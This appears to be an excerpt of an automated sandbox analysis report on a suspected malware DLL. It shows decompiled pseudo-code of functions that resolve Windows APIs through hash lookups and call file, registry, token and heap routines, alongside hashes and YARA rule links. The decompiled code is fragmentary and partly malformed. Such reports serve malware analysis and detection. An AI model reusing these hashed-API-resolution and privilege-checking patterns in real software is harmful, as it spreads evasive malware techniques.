Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: b4d7151890b6421724e872b452db66b8a57ee850b67fa5d13891316372888ed5
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: AD01497038420ABEFFB026E64C84F7B7B4CEB85688F104835BA11551C9FF226458C120

Uniqueness

Uniqueness Score: -1.00%

Function 6EC75BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6EC75BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6EC73064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6EC6C26C(_t24);
				if(E6EC6C280(_t24) != 0) {
					_t34[2] = E6EC735F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6EC73064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6EC73698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6EC73064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6ec75bbd
0x6ec75bc1
0x6ec75bc4
0x6ec75bc7
0x6ec75c09
0x6ec75c12
0x6ec75c18
0x6ec75c19
0x6ec75c0b
0x6ec75c0d
0x6ec75c0d
0x6ec75c2f
0x6ec75c43
0x6ec75c31
0x6ec75c3e
0x6ec75c40
0x6ec75c40
0x6ec75c45
0x6ec75c4a
0x6ec75c58
0x6ec75cc3
0x6ec75cc6
0x6ec75c5a
0x6ec75c5f
0x6ec75cac
0x6ec75cb0
0x6ec75cba
0x6ec75cba
0x6ec75cb0
0x6ec75c61
0x6ec75c6d
0x6ec75c72
0x6ec75c86
0x6ec75c88
0x6ec75c89
0x6ec75c8a
0x6ec75c8c
0x6ec75c8e
0x6ec75c8f
0x6ec75c8f
0x6ec75c92
0x6ec75c92
0x6ec75c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EC75C3E

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: 2669b6d6a52f3082bcb499ca8e976ec25babb55c9111756487d2c75d430036b4
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: BE01F57138430ABAFE7026E94D45F7B7B8CDFC6698F008835BA1155189FF126859C121

Uniqueness

Uniqueness Score: -1.00%

Function 6EC75BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6EC75BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6EC73064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6EC6C26C(_t24);
				if(E6EC6C280(_t24) != 0) {
					_t34[2] = E6EC735F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6EC73064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6EC73698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6EC73064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6ec75bd1
0x6ec75bd8
0x6ec75bdb
0x6ec75c09
0x6ec75c12
0x6ec75c18
0x6ec75c19
0x6ec75c0b
0x6ec75c0d
0x6ec75c0d
0x6ec75c2f
0x6ec75c43
0x6ec75c31
0x6ec75c3e
0x6ec75c40
0x6ec75c40
0x6ec75c45
0x6ec75c4a
0x6ec75c58
0x6ec75cc3
0x6ec75cc6
0x6ec75c5a
0x6ec75c5f
0x6ec75cac
0x6ec75cb0
0x6ec75cba
0x6ec75cba
0x6ec75cb0
0x6ec75c61
0x6ec75c6d
0x6ec75c72
0x6ec75c86
0x6ec75c88
0x6ec75c89
0x6ec75c8a
0x6ec75c8c
0x6ec75c8e
0x6ec75c8f
0x6ec75c8f
0x6ec75c92
0x6ec75c92
0x6ec75c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EC75C3E

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: a864f80f3ffc6cc310a286b3af438365fc0c04af446747af6ab65314b163b9fc
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 8D01287578420ABAFF7026F64D84F7B774DDB85658F004835FA11951C9FE226858C121

Uniqueness

Uniqueness Score: -1.00%

Function 6EC75BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6EC75BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6EC73064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6EC6C26C(_t23);
				if(E6EC6C280(_t23) != 0) {
					_t31[2] = E6EC735F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6EC73064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6EC73698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6EC73064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6ec75bb3
0x6ec75bba
0x6ec75c09
0x6ec75c12
0x6ec75c18
0x6ec75c19
0x6ec75c0b
0x6ec75c0d
0x6ec75c0d
0x6ec75c2f
0x6ec75c43
0x6ec75c31
0x6ec75c3e
0x6ec75c40
0x6ec75c40
0x6ec75c45
0x6ec75c4a
0x6ec75c58
0x6ec75cc3
0x6ec75cc6
0x6ec75c5a
0x6ec75c5f
0x6ec75cac
0x6ec75cb0
0x6ec75cba
0x6ec75cba
0x6ec75cb0
0x6ec75c61
0x6ec75c6d
0x6ec75c72
0x6ec75c86
0x6ec75c88
0x6ec75c89
0x6ec75c8a
0x6ec75c8c
0x6ec75c8e
0x6ec75c8f
0x6ec75c8f
0x6ec75c92
0x6ec75c92
0x6ec75c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EC75C3E

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: b54672846d68dc352229012a488b015c2d226294f21da0f3f6853bee860d0a78
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: 7F012B7178420ABAFFB126F54D44F7B7B4CDF85698F104835BE11651C9FF126958C121

Uniqueness

Uniqueness Score: -1.00%

Function 6EC75C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6EC75C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6EC73064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6EC6C26C(_t23);
				if(E6EC6C280(_t23) != 0) {
					_t31[2] = E6EC735F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6EC73064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6EC73698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6EC73064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6ec75c01
0x6ec75c05
0x6ec75c09
0x6ec75c12
0x6ec75c18
0x6ec75c19
0x6ec75c0b
0x6ec75c0d
0x6ec75c0d
0x6ec75c2f
0x6ec75c43
0x6ec75c31
0x6ec75c3e
0x6ec75c40
0x6ec75c40
0x6ec75c45
0x6ec75c4a
0x6ec75c58
0x6ec75cc3
0x6ec75cc6
0x6ec75c5a
0x6ec75c5f
0x6ec75cac
0x6ec75cb0
0x6ec75cba
0x6ec75cba
0x6ec75cb0
0x6ec75c61
0x6ec75c6d
0x6ec75c72
0x6ec75c86
0x6ec75c88
0x6ec75c89
0x6ec75c8a
0x6ec75c8c
0x6ec75c8e
0x6ec75c8f
0x6ec75c8f
0x6ec75c92
0x6ec75c92
0x6ec75c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EC75C3E

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: 1a290fed3600b21e24301871b758c07ebf20b97dc17195343e017674c7252f9d
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: D501267538520ABAFEB026F54D84F7B7B4CDF85698F004835BE1265189FF22A958C120

Uniqueness

Uniqueness Score: -1.00%

Function 6EC75E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6EC75E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6EC6C280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6EC73064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6ec75e14
0x6ec75e15
0x6ec75e17
0x6ec75e1d
0x6ec75e1f
0x6ec75e23
0x6ec75e23
0x6ec75e27
0x6ec75e33
0x6ec75e67
0x6ec75e67
0x00000000
0x6ec75e35
0x6ec75e3a
0x6ec75e3b
0x6ec75e4f
0x6ec75e60
0x6ec75e51
0x6ec75e5c
0x6ec75e5c
0x6ec75e65
0x6ec75e6d
0x6ec75e6f
0x6ec75e72
0x6ec75e77
0x6ec75e77
0x6ec75e7b
0x6ec75e80
0x00000000
0x00000000
0x00000000
0x6ec75e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6EC75D48,?,?), ref: 6EC75E5C

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: 86ee4b11fb7b25aaaf2afd48020c0d20f05c28493fe52ba92d4783ad21ea1a63
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: 44F0F931A19B11BDDF7159BD9C40A9773E8EFD17D0F144E39F580A6188F6619C448261

Uniqueness

Uniqueness Score: -1.00%

Function 6EC75E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EC75E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6EC6C280(_t19) == 0) {
					_v12 = _a8;
					if(E6EC73064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6EC735F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6ec75e87
0x6ec75e89
0x6ec75e95
0x6ec75e9f
0x6ec75eb5
0x6ec75ed4
0x6ec75eb7
0x6ec75ec8
0x6ec75ecc
0x6ec75eec
0x6ec75ece
0x6ec75ece
0x6ec75ece
0x6ec75ecc
0x6ec75ed5
0x6ec75eda
0x6ec75ee3
0x6ec75edc
0x6ec75edc
0x6ec75ede
0x6ec75ede
0x6ec75e97
0x6ec75e97
0x6ec75e97
0x6ec75ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6EC75D79,00000000,?,00000000,?), ref: 6EC75EC8

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: af9b8c057ba0e5c214be8fa9751cfa71352e4d2a14c90d217ecec3a48ff0bc3a
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: BFF0A431358307EFEFB1EEAA9C10AAB77D9AF492D0F104C2AA895C6140FB36D404C721

Uniqueness

Uniqueness Score: -1.00%

Function 6EC7564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EC7564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6EC73064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6EC6E644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6ec75656
0x6ec75658
0x6ec7565f
0x6ec75661
0x6ec75665
0x6ec75667
0x6ec7566a
0x6ec7566d
0x6ec7566d
0x6ec75687
0x00000000
0x00000000
0x6ec75698
0x6ec7569c
0x00000000
0x00000000
0x6ec756aa
0x6ec756ad
0x6ec756b2
0x6ec756b7
0x6ec756b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6EC75698

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: 135f60b7a6139585777aa6da3cb8d20016a70b693d472687d0a03346c03db27b
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 62F0C8B520430AAFE7749E5ACC54DBBBBFCEBC1B50F00851DA0D542240FA31AC50C970

Uniqueness

Uniqueness Score: -1.00%

Function 6EC71030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6EC71030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6EC7306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6EC7306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6ec7103e
0x6ec71040
0x6ec7104e
0x6ec71052
0x6ec7109b
0x00000000
0x6ec7109b
0x6ec71057
0x6ec71058
0x6ec7105a
0x6ec7105f
0x00000000
0x6ec71078
0x6ec7107c
0x6ec71089
0x6ec7108d
0x00000000
0x00000000
0x00000000
0x6ec71096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6EC71089

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: c1da04425322b189671b8333a39c8931ffe8a874d02de97251f08deb9ed51fe3
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: 15F06270344643ABFE5095BC9C78F7F36ED5BC1614F508838B5A0CA198FF78C9498626

Uniqueness

Uniqueness Score: -1.00%

Function 6EC73628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6EC73628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6ec7d228 == 0xa33c83e5) {
					_t7 = E6EC73064(0x60a28c5c, 0x1c6ef387);
					 *0x6ec7d22c = E6EC73064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6ec7d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6ec7d228 = 0;
					}
				}
				_t3 = E6EC73064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6ec7d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6ec73630
0x6ec73638
0x6ec7366b
0x6ec7367c
0x6ec73687
0x6ec73692
0x6ec73694
0x6ec73694
0x6ec73687
0x6ec73644
0x6ec7364b
0x00000000
0x6ec7364d
0x6ec7364d
0x6ec7364e
0x6ec73650
0x6ec73652
0x6ec73653
0x00000000
0x6ec73653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6EC6DE09,?,?), ref: 6EC73692

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 484d733c088a7fe220c21f400e80ae750ab2f02cd58797f52181b81767796336
Instruction ID: f1c4a2d7a88890692ebfe61e59fb187988aefbb6a29466fc44bb6a9f6e589082
Opcode Fuzzy Hash: 484d733c088a7fe220c21f400e80ae750ab2f02cd58797f52181b81767796336
Instruction Fuzzy Hash: 8CF0E23425A2A1FDEE701AEFAC08D5AA6A8FF55695F000C39F284E5204FAB08880D635

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EC61494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6EC61494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6EC6F584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v76, E6EC6F4CC( &_v76) + 0x10);
				E6EC6F4BC( &_v80, E6EC6F4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v84, E6EC6F4CC(_t325) + 0x10);
				E6EC6F4BC( &_v88, E6EC6F4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
